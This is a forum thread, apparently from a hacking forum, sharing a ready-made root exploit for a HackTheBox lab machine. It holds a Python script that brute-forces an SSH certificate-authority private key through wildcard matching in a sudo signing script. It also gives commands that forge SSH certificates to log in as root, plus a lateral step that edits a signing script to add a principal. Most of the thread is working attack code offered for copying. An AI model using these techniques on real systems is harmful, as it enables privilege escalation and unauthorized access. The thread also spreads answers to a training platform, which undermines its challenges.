HTB - Resource Root Exploit Code
by mhsoraa - Monday August 5, 2024 at 07:45 AM
#1
Run this on zzinter@ssg...

import subprocess import string CA_PATH = '/tmp/ca-test' SIGNING_SCRIPT = '/opt/sign_key.sh' PUB_KEY = 'root.pub' USER = 'root' PRINCIPAL = 'root_user' SERIAL = 'ABCD' def run_signing_command(pattern):     with open(CA_PATH, 'wb') as f:         f.write(pattern.encode('utf-8'))     try:         result = subprocess.run(             ['bash', '-c', f"echo -n '{pattern}' > {CA_PATH}; sudo {SIGNING_SCRIPT} {CA_PATH} {PUB_KEY} {USER} {PRINCIPAL} {SERIAL}"],             capture_output=True,             text=True         )         return result.stdout.strip(), result.stderr.strip()     except Exception as e:         print(f"Error running command: {e}")         return "", str(e) def brute_force_patterns(base_pattern=''):     chars = string.ascii_letters + string.digits + '-+=/ \r\n'     while True:         found = False         for char in chars:             pattern = base_pattern + char + '*'             stdout, stderr = run_signing_command(pattern)             if "Error: Use API for signing with this CA." in stdout:                 base_pattern += char                 found = True                 print(f"{base_pattern}")                 break         if not found:             break     return pattern if __name__ == '__main__':     ca_key = brute_force_patterns()     if "-----END OPENSSH PRIVATE KEY-----" in ca_key:         print("\n\nSuccess\n")         file = open("ca-it", "w")         file.write(ca_key)         file.close()     else:         exit("\n\nFail\n")

zzinter@ssg$ python exploit.py zzinter@ssg$ ls ca-it zzinter@ssg$ rm -f keypair* zzinter@ssg$ ssh-keygen -f keypair zzinter@ssg$ chmod 600 ca-it zzinter@ssg$ ssh-keygen -s ca-it -z 200 -I root -V -10w:forever -n root_user keypair.pub zzinter@ssg$ ssh root@ssg -p2222 -i keypair -i keypair-cert.pub root@ssg# ls /root root.txt
Reply
#2
(08-06-2024, 08:57 AM)plumber7777 Wrote: python is not running zzinter@ssg$

can u explain how to do

zzinter@ssg:~$ python exploit.py - -- --- ---- ----- -----B -----BE -----BEG -----BEGI -----BEGIN -----BEGIN -----BEGIN O -----BEGIN OP -----BEGIN OPE -----BEGIN OPEN -----BEGIN OPENS -----BEGIN OPENSS

Just tested it.
Reply
#3
(08-06-2024, 10:11 AM)plumber7777 Wrote: still not working

copy/paste ss/log here.
Reply
#4
zzinter@itrc:~$ which python3 zzinter@itrc:~$ python exploit.py -bash: python: command not found zzinter@itrc:~$ python -bash: python: command not found zzinter@itrc:~$ python3 -bash: python3: command not found zzinter@itrc:~$
Reply
#5
(08-06-2024, 12:42 PM)newbi31 Wrote:
zzinter@itrc:~$ which python3 zzinter@itrc:~$ python exploit.py -bash: python: command not found zzinter@itrc:~$ python -bash: python: command not found zzinter@itrc:~$ python3 -bash: python3: command not found zzinter@itrc:~$

this script is for last step on docker host zzinter@ssg.

to move from zzinter@itrc to docker host ...

zzinter@itrc$ cp sign_key_api.sh sign.sh zzinter@itrc$ chmod +x sign.sh zzinter@itrc$ vi sign.sh Change: supported_principals="webserver,analytics,support,security" To: supported_principals="webserver,analytics,support,security,zzinter_temp" zzinter@itrc$ rm -f keypair* zzinter@itrc$ ssh-keygen -f keypair zzinter@itrc$ ./sign.sh keypair.pub zzinter zzinter_temp | tee keypair-cert.pub zzinter@itrc$ ssh -o CertificateFile=keypair-cert.pub -i keypair zzinter@172.223.0.1 -p2222
Reply
#6
you have to be out of the container
Reply
#7
(08-06-2024, 02:55 PM)mhsoraa Wrote:
(08-06-2024, 12:42 PM)newbi31 Wrote:
zzinter@itrc:~$ which python3 zzinter@itrc:~$ python exploit.py -bash: python: command not found zzinter@itrc:~$ python -bash: python: command not found zzinter@itrc:~$ python3 -bash: python3: command not found zzinter@itrc:~$

this script is for last step on docker host zzinter@ssg.

to move from zzinter@itrc to docker host ...

zzinter@itrc$ cp sign_key_api.sh sign.sh zzinter@itrc$ chmod +x sign.sh zzinter@itrc$ vi sign.sh Change: supported_principals="webserver,analytics,support,security" To: supported_principals="webserver,analytics,support,security,zzinter_temp" zzinter@itrc$ rm -f keypair* zzinter@itrc$ ssh-keygen -f keypair zzinter@itrc$ ./sign.sh keypair.pub zzinter zzinter_temp | tee keypair-cert.pub zzinter@itrc$ ssh -o CertificateFile=keypair-cert.pub -i keypair zzinter@172.223.0.1 -p2222

how can you escalate to zzinter@ssgzzz
Ban reason: Leeching. (Permanent)
Reply
#8
(08-06-2024, 02:55 PM)mhsoraa Wrote:
(08-06-2024, 12:42 PM)newbi31 Wrote:
zzinter@itrc:~$ which python3 zzinter@itrc:~$ python exploit.py -bash: python: command not found zzinter@itrc:~$ python -bash: python: command not found zzinter@itrc:~$ python3 -bash: python3: command not found zzinter@itrc:~$

this script is for last step on docker host zzinter@ssg.

to move from zzinter@itrc to docker host ...

zzinter@itrc$ cp sign_key_api.sh sign.sh zzinter@itrc$ chmod +x sign.sh zzinter@itrc$ vi sign.sh Change: supported_principals="webserver,analytics,support,security" To: supported_principals="webserver,analytics,support,security,zzinter_temp" zzinter@itrc$ rm -f keypair* zzinter@itrc$ ssh-keygen -f keypair zzinter@itrc$ ./sign.sh keypair.pub zzinter zzinter_temp | tee keypair-cert.pub zzinter@itrc$ ssh -o CertificateFile=keypair-cert.pub -i keypair zzinter@172.223.0.1 -p2222

Ask me for a password
Ban reason: Leeching. (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,934 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,400 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,563 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,386 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,684 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)